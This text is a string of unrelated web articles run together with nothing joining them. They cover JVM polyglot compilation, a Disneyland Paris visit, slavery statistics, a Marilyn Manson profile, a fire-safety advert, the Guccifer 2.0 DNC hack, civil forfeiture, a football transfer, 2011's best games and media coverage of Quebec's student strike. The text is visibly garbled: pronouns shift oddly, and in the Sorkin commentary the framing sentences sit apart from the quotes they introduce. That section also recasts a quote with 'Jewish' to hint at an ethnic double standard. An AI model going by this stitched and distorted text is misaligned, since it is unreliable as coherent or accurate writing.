The problem comes in when we try to satisfy more complex cases. Groovy proponents often trot out the example of a Java class inherited by a Groovy class which is in turn inherited by another Java class. In Scala, that would be doing something like this:
public class Shape { public abstract void draw ( Canvas c ) ; }
class Rectangle ( val width: Int , val height: Int ) extends Shape { override def draw ( c: Canvas ) { // ... } }
public class Square extends Rectangle { public Square ( int size ) { super ( size, size ) ; } }
Unfortunately, this isn't exactly possible in Scala. Well, I take that back. We can cheat a bit and first compile Shape using javac, then compile Rectangle using scalac and finally Square using javac, but that would be quite nasty indeed. What's worse is such a technique would completely fall over if the Canvas class were to have a dependency on Rectangle , something which isn't too hard to imagine. In short, Scala is bound by the limitations of a separate compiler, as are most languages on the JVM.
Groovy solves this problem by building their own Java compiler into groovyc, thus allowing the compilation of both Java and Groovy sources within the same process. This solves the problem of circular references because neither set of sources is completely compiled before the other. It's a nice solution, and one which Scala will be adopting in an upcoming release of its compiler. However, it doesn't really solve everything.
Consider a more complex scenario. Imagine we have Java class Shape , which is extended by Scala class Rectangle and Groovy class Circle . Imagine also that class Canvas has a dependency on both Rectangle and Circle , perhaps for some special graphics optimizations. Suddenly we have a three-way circular dependency and no way of resolving it without a compiler which can handle all three languages: Java, Groovy and Scala. This is starting to become a bit more interesting.
Of course, we can solve this problem in the same way we solved the Groovy-Java dependence problem: just add support to the compiler! Unfortunately, it may have been trivial to implement a Java compiler as part of groovyc, but Scala is a much more difficult language from a compiler's point of view. But even supposing that we do create an integrated Scala compiler, we still haven't solved the problem. It's not difficult to imagine throwing another language into the mix; Clojure, for example. Do we keep going, tacking languages onto our once-Groovy compiler until we support everything usable on the JVM? It should be obvious why this is a bad plan.
A more viable solution would be to create a common compiler framework, one which would be used as the basis for all JVM languages. This framework would have common abstractions for things like name resolution and type checking. Instead of creating an entire compiler from scratch, every language would simply extend this core framework and implement their own language as some sort of module. In this way, it would be easy to build up a custom set of modules which solve the needs of your project. Since the compilers are modular and based on the same core framework, they would be able to handle simultaneous compilation of all JVM languages involved, effectively solving the circular dependency problem in a generalized fashion.
The framework could even make things easier on would-be compiler implementors by handling common operations like bytecode emission. Fundamentally, all of these tightly-integrated languages are just different front-ends to a common backend: the JVM. I haven't looked at the sources, but I would imagine that there is a lot of work which had to be done in each compiler to solve problems which were already handled in another.
Of course, all this is purely speculative. Everyone builds their compiler in a slightly different way (slightly => radically in the case of languages like Scala) and I wouldn't imagine that it would be easy to build this sort of common compiler backend. However, the technology is in place. We already have nice module systems like OSGi, and we're certainly no strangers to the work involved in building up a proper CLASSPATH for a given project. Why should this be any different?
It's not without precedent either. GCC defines a common backend for a number of compilers, such as G++, GCJ and even an Objective-C compiler. Granted, it's neither as high-level nor as modular as we would need to solve circular dependencies, but it's something to go on.
It will be interesting to see where the JVM language sphere is headed next. The rapid emergence of so many new languages is leading to problems which will have to be addressed before the polyglot methodology will be truly accepted by the industry. Some of the smartest people in the development community are working toward solutions; and whether they take my idea of a modular framework or not, somewhere along the line the problem of simultaneous compilation must be solved.
Get the biggest daily news stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
What do you give a five-year-old who's obsessed with Frozen? Answer: a trip to Disneyland Paris to meet the cast and experience the magic of the film first-hand.
Like so many girls their age, Josie lives, sleeps and breathes Frozen, a cinematic phenomenon that has become the highest-grossing animated film of all time.
So when the opportunity came for them to meet Anna, Elsa and Olaf and finally visit Disneyland Paris, my wife Ailish and I jumped at the chance.
Admittedly, it was a close call as to who was more excited about the trip, Josie or us.
Frozen Summer Fun runs until September 13, and if your children are fans of the film – an adaptation of Hans Christian Andersen's The Snow Queen – it's an experience not to be missed.
Summer may now be upon us, but winter had descended on a corner of Disneyland Paris, which was transformed into Arendelle – the fictional kingdom where Frozen is set – and Josie insisted on wearing the obligatory sparkly blue Elsa dress.
With its memorable soundtrack, including the Oscar-winning anthem Let It Go, the film's signature song (the lyrics of which have an indelible place in my memory like millions of parents around the world), this summer production was a huge crowd-pleaser.
And if you don't know the words, fear not, they are displayed on giant screens on stage to ensure everyone can join in the fun.
The 18-minute show, which is built on audience participation, began with characters running down the stairs of the ­auditorium and getting the crowd going before launching into Frozen songs.
The climax of the singalong, however, is Let It Go, which heralded the stunning and spectacular arrival of Elsa, accompanied by a blizzard of fake snow descending on the audience. Next, the show builds to a rousing finale.
As well as all this, the Disneyland Paris version of Arendelle has wonderful face painters, who can transform children into their favourite character, plus lots more games and activities based on the film.
Anna and Elsa can also be found ­elsewhere on the vast site and children can queue to have their photo taken with them, along with other Disney stars including Cinderella, Rapunzel, Belle, Snow White and Ariel – and of course everyone's favourite film snowman, Olaf.
All of the stars feature in the Disney Magic parade where characters past and present pass through on floats to the delight of the crowds – it's essential to claim an early spot on the route to secure a decent vantage point.
One of Josie's highlights of the weekend was the Disney Dreams show, a spectacular night-time musical, lighting and fireworks extravaganza set against the backdrop of the Sleeping Beauty castle, where memorable films scenes are projected.
Our perfect base for the trip was a twin double room at Disney's Sequoia Lodge, designed in the style of an American log cabin and a 15-minute walk away from the park entrance.
There are so many rides and attractions it is impossible to list them all, but one of our favourites was Ratatouille: The Adventure, a unique 4D sensory experience.
Wearing 4D glasses and sitting in a ­trackless vehicle like a dodgem car, we were taken on a thrilling journey dropping down into Gusteau's restaurant and through a series of scrapes and adventures.
These included diving under tables and a brush with an oven and a mop, complete with a blast of hot air and a splash of water.
Another ride that stood out was Peter Pan's Flight, where you hop into a galleon for a magical trip through the sky over starlit London, before sweeping through ­Neverland, passing mermaids and pirates on the stunning night-time journey.
Of course for thrill-seekers there are roller-coaster rides such as Crush's Coaster and Big Thunder Mountain. There's something for everyone in this vast complex.
Quite a few of the rides offer the chance to jump queues with a fast pass – worth buying as the waiting time for some of the attractions can exceed an hour.
Among the many places to eat at Disneyland Paris are Bistrot Chez Remy – named after the rodent chef from Ratatouille – at Walt Disney Studios Park, and the Earl of ­Sandwich in Disney Village, which was the perfect place for a pit-stop.
There were so many highlights from our weekend in Disneyland Paris that it's hard to single one out, but with the Frozen Summer Fun extravaganza only running for two more months, you'll be disappointed if you Let It Go.
Get there
A young boy is pictured working at a brick factory in Sarberia, West Bengal, India, in 2009. Child labor was among the practices considered as slave labor by the Walk Free Foundation's Global Slavery Index. File Photo by Zvonimir Atletic/Shutterstock
BROADWAY NEDLANDS, Australia, May 31 (UPI) -- The Global Slavery Index estimates 45.8 million people worldwide live in slavery, with North Korea and India among the worst offenders.
The index, produced by the Australia-based activist group Walk Free Foundation, is based on international surveys of 25 countries. Mauritania, the West African country which previously led the list, was replaced by North Korea. The index says 4.3 percent of the North Korean population lives in slavery.
Other countries with the highest number of slaves per capita are Uzbekistan, Cambodia, Qatar, Pakistan, Democratic Republic of Congo, Sudan, Iraq and Afghanistan. India has the highest number of people in slavery total.
The foundation defines slavery as "situations of exploitation that a person cannot refuse or leave because of threats, violence, coercion, abuse of power or deception."
A 2012 United Nations report on Mauritania estimated 10 to 20 percent of the population lived in slavery. The typical examples given were forced labor or forced marriage.
The Walk Free survey, released Monday, lowered that estimate to 1.13 percent. The country established anti-slavery courts in 2015, although the practice of slave ownership was outlawed in 2007.
The United States is at the bottom of the 167-nation ranking, tied with 15 other countries. The index says 57,700 people live in modern slavery in the United States, largely, it said, in sex trafficking and itinerant labor trafficking.
WEST HOLLYWOOD, Calif. — “We're drinking wodka,” Marilyn Manson said, pronouncing the word like they were a fur-hatted Russian cartoon character, and filling a tumbler. Two tumblers: Like any peacocking musician, they knew that a drinking buddy makes for a ready audience.
They loped from the peach-colored kitchen of a borrowed house here — it belongs to their pal Johnny Depp — through the dining room, past a bin of masks and costumes. There was a horse, a longhaired woman, silver faceplates. “This is my Max Ernst stuff; it's private,” they said. “I get drunk and buy stuff on Amazon.”
Onward to the living room, where they paused to show off a 1927 theremin, then settled into a velvet sofa, clutching their drink with black-polished fingers. They wore buttoned-up black and the dregs of eye makeup, with choppy hair. The room was kept cold, the way they like it, fitting for a performer known for their graveyard tastes and collection of Nazi-era weaponry.
There was a time, years ago, when being one-on-one with them might have induced a shiver, given their cultivated prince of darkness aura, occasional unhinged behavior and citations for assault and battery. Now, they had just stepped out from a video shoot in another room brightly singing “The Thong Song.” “The ‘Thong Song' is a strong song,” they said, employing their favorite kind of goofy wordplay. Marilyn Manson, as it happens, really enjoys a pun.
A home energy monitoring system and a smart fire alarm system are some best solutions, as you will find out here.
If you are making these mistakes, your home is at fire hazard too:
1) Forgetting to clean the dryer filter.
Clothes and lint are flammable. Check your filters before you start drying.
2) Leaving the lights on, when you're away.
Also, always check if your light bulbs are right for your voltage. It can cause fire too.
3) Placing heaters next to the flammable objects.
Like beds, curtains, and rugs.
4) Buying a malfunctioning home appliance.
Cheap appliances are poorly made, their insulation could be thin or improper. That can lead to inflammation.
5) Wearing out the electrical cords.
Don't let your electrical cords expose any wires.
6)Leaving meals on the stove that is on
7) Leaving iron on
These are the most common mistakes, but their actual number is bigger, meaning that it is not easy to pinpoint the cause. Popular preventative measures include regular checks, professional consultation before adding electrical equipment, proper labeling of equipment and ensuring equipment adhere to safety standards. For busy people nowadays, dealing with electrical faults can be daunting.
There are many innovative products that can help you to control and track your home activities without spending lot's of time on it.
Home Energy Monitor
Since checking the electrical system on a regular basis can be hectic, it is better to have a management system that does the work for you. Many homes across the globe are already using energy monitoring systems like Ecoisme.
Ecoisme can detect major home appliances and tell people how much energy they use on them. It can help people to take an active role in managing electric bills. When installed in the panel breaker, Ecoisme measures current and active/reactive power. If the appliance is about to break it makes the change in its electricity consumption pattern. Ecoisme can detect that and notify user that something is about to break. That prevents inflammation.
What savings does an energy monitor bring? By making you aware of the amount of power you are using, the energy monitor can help you change behavior to cut electricity and gas bills. Within the first year of using this gadget, you can realize as much as 15% savings, according to research by the Energy Saving Trust.
Aaron Sorkin is a highly successful screenwriter for television (The West Wing) and movies (A Few Good Men). I had never paid that much intention to Sorkin until they pulled off the high degree of difficulty screenplay for the The Social Network, the Mark Zuckerberg biopic. And then they landed the even more unlikely Moneyball, the Brad Pitt baseball statistics movie.
Their latest project, the HBO series The Newsroom with Jeff Daniels as a heroic crusading anchor, has apparently been a dud. But Sorkin still manages to outrage the easily outraged. From the NYT:
Even by their own reputation for stirring up intense reaction from critics and viewers of their work, Aaron Sorkin kicked off an unusually fevered backlash on Sunday night with an episode of their HBO series, “The Newsroom.” Mr. Sorkin, in an astonishing case of prescience, created a plot that hewed closely to the recent article in Rolling Stone magazine about an accusation of gang rape at the University of Virginia. In examining issues about the inability — or unwillingness — of the legal system to respond adequately to rape victims, as well as how journalism ethics parallel the legal system, Mr. Sorkin presented an argument that some critics found disparaged the credibility of rape victims.
“Some critics questioned HBO for running the episode even as the details of the University of Virginia case — and Rolling Stone's coverage — are being debated after the magazine backed off its initial account over questions about the accuser's credibility. “There could not have been a worse time for this episode, airing in a week when there really are questions about ethics in journalism, and about how we cover sexual assault and rape in the media,” Eric Thurm wrote for the Grantland website."
“There could not have been a better time for this episode, airing in a week when there really are questions about ethics in journalism, and about how we cover sexual assault and rape in the media”?
And Libby Hill, writing for the AV Club, said: “Aaron Sorkin doesn't understand who the victim is. They don't understand how empathy works. And he, as a rich, powerful, white man in the United States, doesn't understand that they are among the most privileged people in the world.”
And Libby Hill, writing for the AV Club, said: “Aaron Sorkin doesn't understand who the victim is. They don't understand how empathy works. And he, as a rich, powerful, Jewish man in the United States, doesn't understand that they are among the most privileged people in the world.”
Here's a revealing paragraph from this New York Times article:Shouldn't the quote read:Here's another NYT paragraph:That's pretty ho-hum boilerplate and certainly won't get Ms. Hill in any trouble with anybody who matters. But what if the NYT paragraph had differed by only a single word:Change one word and their career would be over, right? Unless they could prove it was a slip-up by the reporter or copy editor and have one of them ruined instead. Or reveal they were Jewish, too.
That might make the basis of a good screenplay by Sorkin.
Image: alexeyart/Shutterstock
On Wednesday, a hacker calling themselves "Guccifer 2.0" claimed responsibility for hacking into the servers of the Democratic Party and stealing "thousands" of documents, including oppo research into Donald Trump. The individual, who called themselves a "lone hacker," also made fun of the American security company CrowdStrike for accusing two Russian intelligence agencies of being behind the hack.
"I'm very pleased the company appreciated my skills so highly," the hacker wrote in their blog post. "But in fact, it was easy, very easy [...] Fuck the Illuminati and their conspiracies!!!!!!!!! Fuck CrowdStrike!!!!!!!!!"
However, considering a long trail of breadcrumbs pointing back to Russia left by the hacker, as well as other circumstantial evidence, it appears more likely that Guccifer 2.0 is nothing but a disinformation or deception campaign by Russian state-sponsored hackers to cover up their own hack—and a hasty and sloppy one at that.
The main element pointing to Russia is the timeline of the events. For a year, hackers with ties to the Russian government—likely the FSB and the military GRU—were inside the servers of the DNC, stealing documents and even reading chats and emails, according to CrowdStrike and The Washington Post. Then, after the IT people at the DNC noticed weird network activities and called in CrowdStrike, the hackers got kicked out. This led to the operation being exposed in the media.
"That's how a blown operation was rapidly transitioned into an influence operation and a disinformation and deception campaign."
That's when the Russian intelligence services likely decided they needed to come up with a cover hacker identity to claim credit and shift blame away from themselves. Guccifer 2.0 had no online history until yesterday, and multiple security sources said they'd never heard of nor seen anyone by that alias until Wednesday.
This suggests that the Guccifer 2.0 persona—whose name references Guccifer, a notorious Romanian hacker who is jailed in the US and claims to have hacked Hillary Clinton's private email server—was created in response to the news of the hack, and was used to put up a defiant blog post and leak documents directly to Gawker and The Smoking Gun at the same time.
Or, as The Grugq, a well-known independent security researcher put it:
1. 2015–06-??: Russian Intelligence services penetrated the DNC and collected a large amount of information. [Collection]
2. 2016–06-??: CrowdStrike purges them from the network [Blown]
3. 2016–06–14: The cyber espionage operation is exposed in the media [Blowback]
4. 2016–06–14: Russian intelligence services leak a targeted selection of documents through various media channels. [Influence]
5. 2016–06–15: Russian intelligence services create a cover hacker identity to claim credit and shift blame away from themselves. [Deception]
"If this is, as it appears to be, a Russian intelligence operation, that's how a blown operation was rapidly transitioned into an influence operation and a disinformation and deception campaign, which started to mitigate the blowback," The Grugq said. "Given that the media is currently reporting that the cover hacker was responsible, and not Russian intelligence services after all, it seems the deception operation is working."
Given all the evidence available, as well as the timeline of the events, it's "more likely than not" that the whole operation, including the Guccifer 2.0 part, was orchestrated by Russian spies, according to Thomas Rid, a cybersecurity expert.
"One of the most convincing details to me is how quickly this hacker apparently came out with this pretty sophisticated false flag operation, including leaking files and talking to various media outlets. It's too smooth for one hacker," Rid, who is a professor in the Department of War Studies at King's College London, told me in a phone call on Thursday.
"It's too smooth for one hacker."
While this might seem like a wild theory, there's also a trail of evidence pointing in Russia's direction. (Both CrowdStrike and the DNC, moreover, are still pointing their fingers at Russia.)
The first, most easy to spot one, is the use of ")))" instead of a standard smile emoticon in the Guccifer 2.0 blog post. Using a single or multiple ")" instead the usual ":)" is very common for Russians, given the awkward way one needs to type the colon in a Russian keyboard.
That's not all though. The leaked documents contain metadata indicating they've been opened and processes on multiple virtual machines, as the independent cybersecurity researcher known as Pwn All The Things pointed out on Twitter on Wednesday. Some of these machines had different configurations, including one with the Cyrillic language setting and the username of "Iron Felix," referencing Felix Dzerzhinsky, the first head of the Soviet intelligence services.
The computer or virtual machine where the leakers processed the documents sent to Gawker used the Russian language setting. The same document posted on the Guccifer 2.0 blog post, however, did not.
15) Spot the difference: Left: doc sent to Gawker (page 210). On right, same page in Pwn All The ThingsJune 15, 2016
Moreover, as someone on Twitter found, the software used during the analysis process was a cracked version of Office 2007, which, according to the Twitter user who found this, happens to be popular in Russia.
Could all these breadcrumbs have been left on purpose? Of course, but then the explanation would be that someone has done an awful lot of work to leave evidence pointing to Russia in a blog post where they or they were claiming to have nothing to do with Russia.
"Given the evidence in the docs only, it's a weak attribution to a group in Russia," Pwn All The Things told Motherboard in an online chat. "Given the evidence combined with everything else, I think it's a strong attribution to one of the Russian intelligence agencies."
Using a lone hacker or an hacktivist to deflect blame is not new for Russia, as Timo Steffens, who works for German Computer Emergency Response Team (CERT-Bund) pointed out. Such a strategy is "reminiscent" of using a blog post written by an alleged group called CyberBerkut to cover up an attack on the German government. The same thing happened with a fake "analysis blog" after the hack on the French station TV5Monde, they tweeted.
"A foreign intelligence agency [...] is doing a sophisticated hack and influence operation in support of the presumptive nominee of the Republican Party."
But why would Russia want to hack the DNC? First of all, it would make sense just from an intelligence collection standpoint. That's what spies do. But in this election cycle, there's another reason: the Russian government would like to have Donald Trump as president.
"Look, the coming elections are of high priority for Russia as many people close to the Kremlin believe that Trump could help to lift the sanctions and ease the tensions between Russia and the US," Andrei Soldatov, an independent journalist who has written extensively about Russia's surveillance powers, told Motherboard in an email.
And hacking the DNC and embarrassing Hillary Clinton would help with that.
There's no way to know for sure that the Russian government and its intelligence agencies are really behind the hack on the DNC and the bizarre claims by Guccifer 2.0. (The Russian embassy in Washington, DC did not respond to a request for comment.) But if they are, this might be a huge turning point in the history of government hacking campaigns.
"Let's spell this out," Rid said. "We have a foreign intelligence agency that is picking sides, that is doing a sophisticated hack and influence operation in support of the presumptive nominee of the Republican Party in the US general elections. That's craziness, if that's actually the case."
After more than two years, Matt Lee won back $2,400 taken from them through civil forfeiture in July 2011 by the sheriff department in Humboldt County, Nev. (Gabe Silverman/The Washington Post)
AMERICANS LAST week got a public display of President Trump's decision-making style. To call it “impulsive” gives them too much credit.
Mr. Trump met with a group of sheriffs, who, as they groused about their critics, seem to have extracted a new policy position from a credulous and apparently ill-informed president. The sheriffs spoke about “civil asset forfeiture” — a bizarre police power prone to abuse yet beloved by law enforcement — and Mr. Trump concluded that only “bad people” would pressure them to change the practice.
If that is so, there are a lot of “bad people” in the United States. An ideologically diverse, bipartisan movement that includes many Trump supporters opposes civil asset forfeiture, because it allows police to seize property from Americans on shockingly flimsy legal grounds.
Officers do not have to show that those deprived of their property ever committed a crime. Often, all they need to show is suspicion that cash or cars might have been related to criminal activity. In practice, officers have noted the presence of energy drinks and junk food in cars, a motorist's facial twitches under questioning, the presence of duct tape, “inconsistent” statements from motorists who do not speak English well, and other hardly damning details to gin up the required “suspicion.” Under a state-federal program, police departments then get to keep a slice of the money they take. Owners of seized property can appeal, but it is on them to show that the goods were legally acquired, and it is expensive to lodge the necessary legal objections.
Investigations of civil asset forfeiture, which was conceived as a way to combat major international drug traffickers, has uncovered examples of unforgivable abuse. Lives have been upended. Take Ming Tong Liu, a Georgia man whose story The Post detailed in a 2014 investigation. They raised $75,000 in cash from relatives to buy a Chinese restaurant. Pulled over for going 10 miles per hour over the speed limit, the police took their $75,000. They only got it back after 10 months and a lot of hassle, at which point they could no longer buy the restaurant.
Mr. Trump did not seem to know any of this, appearing confused about what the program actually does. The sheriffs did not help. “They make up stories,” one sheriff said of civil forfeiture critics. No one at the table offered to speak up for those whom police have victimized, or to point out the clear conflict of interest in allowing police departments to profit from the assets they seize.
A variety of states have passed or are considering reforms to their civil forfeiture system. Some have abolished it, stipulating that assets can be seized only from convicted criminals. Others have simply specified that it can be used only in cases involving a large amount of cash. At the least, seized money should go into state and federal treasuries, not directly to police.
We can only hope that Mr. Trump or their advisers get the real story. If not, state governments should ignore him.
David Villa is to leave Barcelona this summer, although it will not be an easy deal to seal. The footballer knows they do not feature in Vilanova's plans for next season. They have not played much this year and Neymar's arrival limits their options even further, but the Spanish player has no intention of losing out financially in the move.
When Barcelona signed him, it was for four seasons, until 2014, during which time they would receive a sum of €7.5 million a year. MARCA has discovered, however, that the club accepted the inclusion of a clause by which it is required to pay €11 million to the footballer in their last season.
Barcelona wanted to reward the player's efforts in forcing their exit from Valencia when the club did not want to sell him. That €11 million, however, now poses a problem for all parties involved. Barça cannot shell out such a large amount for a player who will be on the bench and which will make Villa the second highest-paid player in the squad. It will also prove difficult for Villa themselves to find a club willing to pay that sum for someone of their age (31) who has had an injury as serious as a fractured tibia.
Villa has offers on the table from the Premier League, Tottenham and Arsenal, but they are not in any hurry to make a decision. The Spanish international will wait until the Confederations Cup is done and dusted to study all the options and come to a decision. They will be looking for a long-term contract to make up for any loss in salary.
By Brett Molina and Mike Snider, USA TODAY
This year in video games was all about variety. The blockbuster releases of 2011 represented a wide range of genres from action-adventure to first-person shooter, as well as a diverse selection of platforms -- from a console to a smartphone.
After much debate and discussion, Game Hunters was able to narrow down our top 10 games of 2011:
10.Dead Space 2
Fans of the first Dead Space knew what was coming when they booted up the sequel. Zombie-like Necromorphs will drop from ceilings or pop through vents, and some "corpses" will suddenly spring back to life. Yet, the sequel still managed to strike anxiety and panic in players, as they scrambled to restore health and find resources with frightening foes attacking from all sides.
9. Jetpack Joyride
"Easy to play, hard to master" is thrown out frequently in the games business, but no title represented this more effectively than this mobile side-scroller from the creators of Fruit Ninja. Armed with experimental jetpacks, players guided Barry Steakfries through a series of levels set in a laboratory. The mechanics were simple: Tap or hold the touch screen to change Barry's altitude. As players were introduced to upgrades such as Gravity Suits and obstacles including guided missiles and electricity fields, the game began to show signs of complexity, and eventually, became very tough to put down.
8. The Legend of Zelda: Skyward Sword
Even after 25 years, the adventures of Link continue to delight video game players. The latest epic for the Nintendo Wii is no different, blending clever puzzle solving with strong motion-based action enhanced with the addition of MotionPlus technology for better accuracy.
7. Gears of War 3
Epic Games' final chapter in the Xbox 360 trilogy was not only the best in the series, but 2011's best shooter in either first- or third-person form. The reason? It delivered the most complete package across all fronts. Its single-player campaign -- starring Marcus Fenix and their trusty chainsaw bayonet -- is explosive, littered with countless varieties of alien foes to keep players on edge. Meanwhile, the improvements in competitive multiplayer and bolstered cooperative modes including Horde and Beast add some extra power.
6. Bastion
While video game players are treated to a sequel buffet at retail stores, digital downloads such as Supergiant Games' role-playing adventure are proof that originality and creativity still thrive. The unique approach to storytelling -- highlighted by a shrewd, soulful narrator recounting in-game events -- meshes beautifully with a combat system that is surprisingly robust.
5.L.A. Noire
Rockstar Games could have easily released this 1940s-era detective drama in the Grand Theft Auto mold and still delivered a strong game. Instead, they created a sophisticated action experience by blending smart investigative and interrogation mechanics with the traditional combat. Players scoured crime scenes, broke down key witnesses and chased down criminals to restore law and order to Los Angeles.
4. Uncharted 3: Drake's Deception
The PlayStation 3's premier action hero strikes again with another gripping adventure. Their quest for clues about ancestor Sir Francis Drake takes them to the Arabian Peninsula in search of a mysterious lost city. Like 2009's Uncharted 2, the third chapter features astonishing action sequences and sharp dialogue. The scenes of Drake in the desert are particularly mesmerizing.
3. Batman: Arkham City
It's one thing to open up the world for players explore and toss out a who's who of Dark Knight villains inside a city-size prison, but Rocksteady Games' ability to maintain cohesion throughout the story is what elevated this game to the top tier. This continued devotion to Batman lore is why this is the best video game franchise based on a superhero out there.
2. Portal 2
The charming puzzle game features a test subject running through a battery of challenges armed with a gun that creates portals. It's highlighted by two of the year's most memorable characters: the witty assistant Wheatley and GLADOS, the crazed artificial intelligence running Aperture Science. The dialogue and puzzles were wonderfully crafted, and the co-op mode proved equally engaging.
1. The Elder Scrolls V: Skyrim
Once players slay their first dragon, the role-playing odyssey from Bethesda Softworks will have them hooked. It's easy for players to sink dozens -- if not hundreds -- of hours exploring new towns and accepting fresh quests and still feel like they've only scratched the surface of what the world of Skyrim offers.
When Quebec students went on strike last spring in protest over an announced 75 percent tuition hike—part of a package of austerity measures by Quebec's provincial government—U.S. media paid scant attention. The six-month-long strike was the largest and longest student strike in North American history; hundreds of thousands of Québécois repeatedly took to the streets, with thousands arrested. Yet the strike elicited not a single story from any of the three major U.S. broadcast networks, PBS NewsHour or the Washington Post.
In Morning Edition's sole story on the Quebec student movement (5/15/12), NPR's David Greene characterized the protests against the tuition hike, which had for the most part proceeded peacefully, as “weeks of violent street rallies.” NPR reporter Brian Mann told listeners, “Hoping to convince the government to change course, student groups have blocked access to Montreal's massive seaport, blockaded bank entrances, vandalized businesses and clashed with police.” The word “strike”—the primary, nonviolent form of protest over the six months—was never uttered in the NPR report, which focused instead on direct action tactics employed by a minority of protesters.
Morning Edition's primary source was then-Montreal Mayor Gerald Tremblay, commenting on an incident in which smoke bombs had been set off in Montreal's subway—which was widely condemned by the striking student associations (Montreal Metro News, 5/11/12). No representatives of those associations was interviewed, however; instead, Mann paraphrased a French-speaking protester: “This student, who will only give their name as Adam, says the smoke bomb attack was an efficient way to disrupt Montreal's economy, blocking the Metro and causing big traffic jams.” NPR counterposed “Adam's” views with those of an English-speaking student who, in Mann's words, “thinks the protests have gone too far.”
“There are signs that a lot of Montrealers are already fed up,” said Mann. “The Montreal Gazette published an editorial this week, warning of anarchy in the city.” Yet the editorial page of this conservative English-language newspaper (circulation: 116,000) would seem a very limited barometer of Montrealers' opinion on the strike.
Similarly, the New York Times' description of events ignored the largely peaceful character of the majority of the protests. “The lengthy student strike has led to violence on the streets of Montreal,” wrote reporter Ian Austen, in the paper of record's first report on the strike (5/17/12)—which was filed from Ottawa, in the province of Ontario.
Actually, as an op-ed by two Université de Montréal professors that was later published by the Times (5/24/12) would point out: “Since the beginning of the student strike, leaders have told protesters to avoid violence. Protesters even condemned the small minority of troublemakers who had infiltrated the demonstrations.” Yet this nuance was left out of the six news reports the Times published on the Quebec protests.
In these articles, when the tuition increase was mentioned, it was always qualified. “Quebec residents pay the lowest rates in Canada,” Austen (5/17/12) stated, forcing readers to do a word problem to understand the government proposal: “The government wants to increase the annual university tuition of $2,144 by $321 a year for five years.”
A 228-word Associated Press newswire piece published in the Times (5/25/12) similarly contextualized the strike, writing, “Quebec has the lowest tuition rate in Canada, about $2,150, and even after the increases, the rate would remain among the lowest in the country.”
But the elected student groups leading the strike consistently emphasized that their movement was about a broader set of issues, revolving around the defense of Quebec's public services, in which accessible post-secondary education is a crucial plank (Montreal Media Co-op, 3/22/12; Democracy Now!, 5/7/12). To many Québécois, the tuition hike represented a move toward a model of education that treats college as an individual student's “investment” (often paid for through debt). Supporters of the student strike saw this as a betrayal of the social democratic reforms enacted through Quebec's historic Quiet Revolution of the 1960s, when secular post-secondary education, seen as an essential social good benefiting society at large, was first made accessible to the French-speaking majority (Montreal Gazette, 3/28/12; La Presse, 5/28/12).
Pinning small squares of red cloth to their clothes, the striking students denounced their government's push for a model of education that would leave Quebec's younger generations “carrément dans le rouge” (“squarely in the red”). But the Times never included students' view on the reasons for the strike.
A couple of AP pieces (5/26/12; 5/28/12) did mention the broader significance of accessible post-secondary education within Quebec society. On May 26, the AP wire carried a piece that explained that Quebec's low tuition originated as part of the Quiet Revolution's package of progressive social programs, adding that many European countries make similar commitments to accessible education.
Yet these more historically grounded AP pieces were never published in the New York Times. And even the AP's later reporting on the strike omitted this historical context, replacing it with geographic comparisons: “Quebec's average undergraduate tuition $2,519 a year is the lowest in Canada, and the proposed hike $254 per year over seven years is tiny by U.S. standards,” stated AP's final article on the strike (8/1/12). “But many Quebecois are more likely to compare themselves to European countries where higher education is mostly free, rather than the U.S.”
It did not seem to be Québécois, but rather corporate journalists, who were most likely to explain the strike through comparisons to other jurisdictions more familiar to English-speaking North American news consumers.
U.S. media coverage of the strike in many ways reflected the silences and biases of Canada's own corporate press when it came to the striking Quebec students. As Canadian media critic Judy Rebick (Conseil de Presse du Québec, 4/24/12) has observed, for months there was very little coverage of the strike at all outside of Quebec in the English Canadian media.
And the tuition hike was explained in Canada's corporate press in almost exclusively monetary terms, comparing Quebec tuition to prevailing rates in Canada's Anglophone provinces. “It's a little hard for the rest of us to muster sympathy for Quebec's downtrodden students, who pay the lowest tuition fees in all of North America,” wrote Margaret Wente, a columnist for the Globe and Mail (5/1/12), Canada's leading national newspaper. (The implication that Anglophone norms should be followed in Quebec, given its status as a distinct French-speaking society with control over its own educational policy, is far from a neutral proposition.)
Expressing a disdain for the strike that journalism professor Ellen Russell (rabble.ca, 5/29/12) argues was widely echoed amongst the Canadian corporate media punditry, Wente added, “The total increase would amount to the cost of a daily grande cappuccino.” The protesters, Wente declared, were the “Greeks of Canada.”
Meanwhile, powerful Canadian media corporations uncritically accepted the Quebec government's delegitimizing terminology. While both the provincial government and news media referred to similar standoffs as “student strikes”—reflecting a long-standing recognition of the right of students to strike—in 2012 the Quebec government refused to use the term. Much of the corporate media followed suit; the Montreal Gazette referred to the strike as a “boycott of classes,” while the executive producer of CTV Montreal declared, “I refuse to call it a ‘strike.'” (CTV instead referred to the strike as a “protest”—4/13/12.)
What little U.S. reporting there was on the Quebec student strike drew, either explicitly or implicitly, on this deeply problematic Anglo-Canadian corporate media coverage. NPR's strange omission of the fact that the whole conflict centered around a student strike may reflect Morning Edition's reliance on sources like CTV and the Gazette. The United Press International newswire, which also drew extensively on the Gazette's reporting, consistently reported on the student strike as a “boycott.”
U.S. journalists' uncritical reliance on the Gazette for strike coverage is particularly problematic, given that researchers at the Université de Quebec à Montréal found that this Anglophone newspaper, owned by the right-win conglomerate Postmedia Network, had taken a decidedly hostile stance on the student-movement (Fédération Professionnelle des Journalistes Québecois, 6/17/12).
The Gazette editorial NPR's Mann drew on for their assessment of Montreal public opinion typified what some francophone scholars and journalists (Le Monde Diplomatique, 7/12; La Presse, 5/28/12; Le Devoir, 5/25/12) have criticized as the Anglo-Canadian press's inflammatory, stereotypical coverage. That Gazette editorial (5/11/12), published under the headline “Democracy or Anarchy: It's Time to Take a Stand,” blamed “the folly of the student rebels” on “Quebec society” at large, which, according to Gazette editors, is “defined by a culture of collective entitlement at others' expense.”
“An assertion of the lawful and legitimate order of things would be in the long-term interest of all Quebecers,” the editors proclaimed. “It would take some concentration of the Québécois mind, to be sure.” This editorial illustrates what 11 Quebec professors (Le Monde Diplomatique, 7/12) meant when they said that “for the vast majority of the Anglo-Canadian press, this movement is about the ‘spoiled children' of a parasitical province.” For many Quebecois, by contrast, it is a struggle over a vision of society anchored in history and culture.
This discrepancy raises at once the issue of corporate media bias towards social movements—well-documented by FAIR in the case of Occupy Wall Street (FAIR, 9/23/11, 10/4/11), and the long-observed pattern of “two solitudes” between English- and French-speaking Canadians. Much U.S. reporting approached the Québécois student movement squarely from the other side of this contentious cultural, political and linguistic gulf.
